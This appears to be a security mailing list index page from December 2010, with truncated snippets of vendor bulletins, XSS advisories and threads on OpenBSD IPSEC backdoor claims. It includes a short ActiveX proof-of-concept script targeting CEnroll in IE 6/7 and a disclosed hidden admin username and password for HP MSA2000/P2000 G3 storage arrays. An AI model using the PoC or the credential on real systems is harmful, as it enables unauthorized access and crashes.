VUPEN Security Research - Microsoft Office Publisher Memory Corruption
Vulnerability (VUPEN-SR-2010-041)

http://www.vupen.com/english/research.php

I. BACKGROUND
---------------------

"Microsoft Publisher, is a desktop publishing application from Microsoft. It
is
an entry-level application, dif

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02660754
Version: 1

HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon

[ more ]  [ reply ]

Hi,

I am pleased to announce that we have made a new major release of
Openwall GNU/*/Linux, version 3.0. ISO images of the CDs for i686
and x86-64 are available for download via direct links from:

http://www.openwall.com/Owl/

The ISOs include a live system, installable packages, the installer
pr

[ more ]  [ reply ]

> We has OpenBSD tell us:
>
> "We have never allowed US citizens or foreign citizens working in the
> US to hack on crypto code"
> http://marc.info/?l=3Dopenbsd-tech&m=3D129237675106730&w=3D2

That statement remains true.

IPSEC isn't 100% crypto; it is a complex layered subsystem with many
other e

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02653973
Version: 1

HPSBMA02616 SSRT100231 rev.1 - HP Insight Management Agents Running on Linux and Windows, Remote Full Path Disclosure

NOTICE: The information in this Security Bulletin should

[ more ]  [ reply ]

ÉÓÐÏÌØÚÏ×ÁÔØ Ó×ÏÊ ÍÏÚÇ! Is we think with our brain and ask: "how is
team OpenBSD lying to is public" well then is the proof is in the
ËÁÛÁ!

We has OpenBSD tell us:

"We have never allowed US citizens or foreign citizens working in the
US to hack on crypto code"
http://marc.info/?l=openbsd-tech&m=1

[ more ]  [ reply ]

On 12/14/10 8:35 PM, musnt live wrote:
> Original e-mail is from Theo DeRaadt
>
> http://marc.info/?l=openbsd-tech&m=129236621626462&w=2
>

Then also read Jason Wright's response and clear denial:
http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

--
Michael Scheidell, CTO
o: 561-999-5000
d: 5

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02652463
Version: 1

HPSBMA02615 SSRT100228 rev.1 - HP Insight Diagnostics Online Edition Running on Linux and Windows, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:255
http://www.mandriva.com/security/
______________________________________________________________________

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:254
http://www.mandriva.com/security/
______________________________________________________________________

[ more ]  [ reply ]

www.eVuln.com advisory:
BBCode CSS XSS in slickMsg
Summary: http://evuln.com/vulns/162/summary.html
Details: http://evuln.com/vulns/162/description.html

-----------Summary-----------
eVuln ID: EV0162
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Critical Level: low
Type: Cross Site Scripting

[ more ]  [ reply ]

www.eVuln.com advisory:
"post" - Non-persistent XSS in slickMsg
Summary: http://evuln.com/vulns/161/summary.html
Details: http://evuln.com/vulns/161/description.html

-----------Summary-----------
eVuln ID: EV0161
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Critical Level: low
Type: Cross Si

[ more ]  [ reply ]

Original e-mail is from Theo DeRaadt

http://marc.info/?l=openbsd-tech&m=129236621626462&w=2

I have received a mail regarding the early development of the OpenBSD
IPSEC stack. It is alleged that some ex-developers (and the company
they worked for) accepted US government money to put backdoors into

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-1024-2 December 13, 2010
openjdk-6 regression
https://launchpad.net/bugs/688522
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu

[ more ]  [ reply ]

iDefense Security Advisory 12.14.10
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 14, 2010

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. that has been included with Microsoft Windows since 1995. For
more information about Internet Explorer, pl

[ more ]  [ reply ]

> 1) Yup, pretty unconvincing. Though one could separate window shadows,

I'm guessing you have your window manager configured to render window
shadows. In this case, this is less plausible, yup, unless you do the
inverted gradient trick.

> 2) Where is "here"? :)

I tried to dig something up, but c

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02656471
Version: 1

HPSBOV02618 SSRT100354 rev.1 - HP OpenVMS Integrity Servers, Local Denial of Service (DoS), Gain Privileged Access

NOTICE: The information in this Security Bulletin should be

[ more ]  [ reply ]

http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmt
ca.txt
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmt
ca-exploit.c

==-===-=====-=======-===========-=============-=================

IBM Tivoli Storage Manager (TSM) Local Root

[ more ]  [ reply ]

On Mon, 13 Dec 2010 hpdisclosure (at) anonmail (dot) de [email concealed] wrote:

> i just found out that there is a hidden user on every HP MSA2000 G3
> SAN out there:
>
> username: admin
> password: !admin

Confirmed on P2000 G3 (fw L100R013). (Please, HP, is it really
necessary to give us *so many* different reasons to hat

[ more ]  [ reply ]

PoC:

<script language=javascript>

try

{

var tar = new ActiveXObject('CEnroll.CEnroll.2');

var a="sl";

tar.setPendingRequestInfo(0x05050505,a,a,a);

}

catch(sl){}

</script>

Tested on IE 6/7

Discovered by: Securitylab.ir (Kamran_st (at) yahoo (dot) com [email concealed])

Homepage: http://Securitylab.ir

[ more ]  [ reply ]

=====[BEGIN-ACROS-REPORT]=====

PUBLIC

========================================================================
=
ACROS Security Problem Report #2010-12-14-1
------------------------------------------------------------------------
-
ASPR #2010-12-14-1: Remote Binary Planting in Windows Address Book
=

[ more ]  [ reply ]

Hi folks,

Two minor things that do not deserve a lengthy discussion, but are
probably mildly interesting and worth mentioning for the record:

1) Chrome browser is an interesting example of the perils of using
minimalistic window chrome, allowing multiple windows to be spliced
seamlessly to confuse

[ more ]  [ reply ]

iDefense Security Advisory 12.14.10
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 14, 2010

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. that has been included with Microsoft Windows since 1995. For
more information about Internet Explorer, pl

[ more ]  [ reply ]

Hi,

The OSSTMM has been released today at www.osstmm.org.

It's a big document so you may want to check out first some of the
reviews and commentary on it first. InfoSec Island is having an OSSTMM
week to spread the word:

https://www.infosecisland.com/osstmm.html

Some of the articles available:

[ more ]  [ reply ]

www.eVuln.com advisory:
"post" - Non-persistent XSS in slickMsg
Summary: http://evuln.com/vulns/161/summary.html
Details: http://evuln.com/vulns/161/description.html

-----------Summary-----------
eVuln ID: EV0161
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Critical Level: low
Type: Cross Si

[ more ]  [ reply ]

On 12/13/2010 11:19 AM, Michael Bauer wrote:
> An administrator is very different there are many levels of
> administrative control in windows to say an admin is an admin is
> absurd.

I disagree. There's only one level of pwned.

> There is a big difference between a local admin and a domain
> admi

[ more ]  [ reply ]

Hey Dan,

Freaking THANK YOU first and foremost. I've been waiting for someone to say that for days now, and was just about to myself.

Just because everyone and their brother want's to show off that they can compile & run some software (herp a derp, good job) DOESN'T mean they should immediately p

[ more ]  [ reply ]

>The attack has some academically interesting details about how cached
>credentials work, but I agree with Stefan. If you own the machine, you own
>the machine. What's to stop you from, say, simply installing a rootkit?

Exactly. More importantly, even if you must make users local admins, there is

[ more ]  [ reply ]

Everyone.

Please read my original post.  I never claimed to gain access to
networked resources using the masqueraded account.  My method merely
shows that you can modify the SAM and SECURITY hives without using DLL
injection or any other advanced technique that security Admins are
currently looking

[ more ]  [ reply ]

Can anyone confirm this vulnerabilty?
I don't have a MSA for testing at the moment.

> Hi,
>
> i just found out that there is a hidden user on every HP MSA2000 G3
> SAN out there:
>
> username: admin
> password: !admin
>
> this user doesnt show up in the user manager, and the password
> cannot be

[ more ]  [ reply ]